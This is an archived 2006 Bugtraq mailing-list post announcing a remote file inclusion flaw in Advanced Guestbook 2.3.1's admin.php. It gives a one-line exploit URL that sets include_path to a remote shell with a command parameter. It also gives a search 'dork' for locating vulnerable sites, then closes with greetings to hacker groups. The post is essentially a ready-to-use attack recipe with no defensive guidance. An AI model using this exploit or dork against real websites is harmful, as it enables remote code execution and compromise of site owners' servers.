lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 3 Nov 2006 21:02:25 -0000
From: broken-proxy@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Advanced Guestbook 2.3.1 (Admin.php) Remote File Include


#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Author: BrokeN-ProXy
Script  : admin.php
Found : www.hotscripts.com
Risk    : Dangerous
Dork   : "powered by: Advanced Guestbook 2.3.1"

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Exploit:

www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd

Notice:

[AGuest Path] may be more than One, You are adviced to use the direct result os search.

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

GreestZ: 
nEt^DeViL[ My Best friend ] .:.  RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker ] .:. SnIpEr_SA .:. Eddy_BAck0o .:.  Red Devils Crew[ â|Màëstrô ]  .:. PROHacker  .:. Devil-00 .:. Red_Casper  .:.  ReMoTeR  .:. Le CoPrA .:. Mor0ccan Islam Defenders Team .:. Mr.Elgaarh  .:. Team-Evil [ X-BLooD-X ]  .:. MosT3mR .:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=-
And All Users in:
www.3asfh.net/vb/
www.lezr.com/vb/

broken-proxy[at]Linuxmail[dot]org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ